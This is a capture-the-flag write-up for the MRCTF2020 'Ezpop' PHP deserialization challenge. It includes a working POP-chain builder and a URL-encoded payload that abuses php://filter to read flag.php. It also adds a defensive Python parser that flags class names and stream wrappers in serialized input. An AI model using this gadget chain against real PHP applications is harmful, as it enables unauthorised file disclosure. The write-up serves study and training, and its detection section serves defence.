阿新 • Published: 2021-05-23
[MRCTF2020]Ezpop
Key points: 1. Constructing a POP chain 2. Pseudo-protocols (PHP stream wrappers)
- First, look at the source code
```php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
```
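The goal is to find a way to reach the Modifier class and trigger its file inclusion.
I did not write down the magic methods in the previous POP chain challenge, so this time here is a rough summary of what each magic method does.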
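Magic method | Purpose |
---|---|
`__construct()` | Called when an object is created |
`__destruct()` | Runs when all references to an object have been removed or when the object is explicitly destroyed |
`__sleep()` | Called when an object is serialized |
`__wakeup()` | Called when an object is unserialized |
`__call()` | Called when an inaccessible method is invoked on an object |
`__callStatic()` | Called when an inaccessible method is invoked in a static context |
`__get()` | Called when the value of an inaccessible property is read |
`__set()` | Called when a value is assigned to an inaccessible property |
`__toString()` | Called when an object of the class is treated as a string |
`__invoke()` | Called when an object is called as if it were a function |
`__isset()` | Called when isset() or empty() is used on an inaccessible property |
`__unset()` | Called when unset() is used on an inaccessible property |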
That is enough for now!
- Code to build the chain:
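```php
<?php
class Modifier {
    // php://filter with convert.base64-encode makes include() output flag.php as base64 instead of executing it
    protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier;
    }
}

$b = new Show;
$b->str = new Test;         // Show::__toString() reads $this->str->source, which triggers Test::__get()
$b->str->p = new Modifier;  // Test::__get() calls $this->p(), which triggers Modifier::__invoke() and the include
$a = new Show($b);          // __wakeup() passes $source (a Show object) to preg_match(), which triggers __toString()
echo urlencode(serialize($a));
?>
```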
payload:
http://a4ef15f6-3d4e-416b-bc25-7ae776bf191f.node3.buuoj.cn/?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
Then base64-decode the output to get the flag.
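
Seen from the defending side, a request like the one above can be recognised before it ever reaches `unserialize()`. The Python sketch below is an added example, not part of the original write-up or the challenge: it walks the PHP serialization format of the `pop` value shown above and reports the class names it embeds and any string that starts with a stream-wrapper scheme. The names `walk`, `inspect_param` and `SAMPLE` are chosen here, and only the `N`, `b`, `i`, `d`, `s`, `a`, `O`, `r` and `R` tags are handled.

```python
import re
from urllib.parse import unquote_to_bytes

WRAPPER = re.compile(rb"^[a-z][a-z0-9.+-]*://", re.I)  # scheme:// prefix such as php://

def walk(buf, pos, classes, strings):
    """Parse one serialized value at buf[pos]; return the offset just past it."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                    # N;
        return pos + 2
    if tag in (b"b", b"i", b"d", b"r", b"R"):          # b:1;  i:5;  d:0.5;  r:2;
        return buf.index(b";", pos) + 1
    if tag == b"s":                                    # s:<byte length>:"<data>";
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        strings.append(buf[colon + 2:colon + 2 + n])
        return colon + 2 + n + 2
    if tag in (b"a", b"O"):                            # a:<n>:{...}  O:<len>:"<class>":<n>:{...}
        count_at = pos + 2
        if tag == b"O":
            colon = buf.index(b":", pos + 2)
            n = int(buf[pos + 2:colon])
            classes.append(buf[colon + 2:colon + 2 + n].decode("latin-1"))
            count_at = colon + 2 + n + 2
        colon = buf.index(b":", count_at)
        pos = colon + 2                                # first byte after "{"
        for _ in range(2 * int(buf[count_at:colon])):  # every entry is a key plus a value
            pos = walk(buf, pos, classes, strings)
        if buf[pos:pos + 1] != b"}":
            raise ValueError(f"expected '}}' at offset {pos}")
        return pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def inspect_param(param):
    """Report class names and wrapper-style strings in one URL-encoded value."""
    buf = unquote_to_bytes(param)
    classes, strings = [], []
    end = walk(buf, 0, classes, strings)
    wrappers = [s.decode("latin-1") for s in strings if WRAPPER.match(s)]
    return {"classes": classes, "wrappers": wrappers, "trailing_bytes": len(buf) - end}

# The pop value from the payload URL on this page, split only for line length.
SAMPLE = ("O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3B"
          "s%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3B"
          "s%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B"
          "%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D")

if __name__ == "__main__":
    print(inspect_param(SAMPLE))
```

Any class name in a parameter that should carry only scalars or arrays is worth an alert on its own. On the application side, passing `['allowed_classes' => false]` as the second argument to `unserialize()` (PHP 7.0 and later) stops the listed classes from being instantiated, so none of their magic methods run.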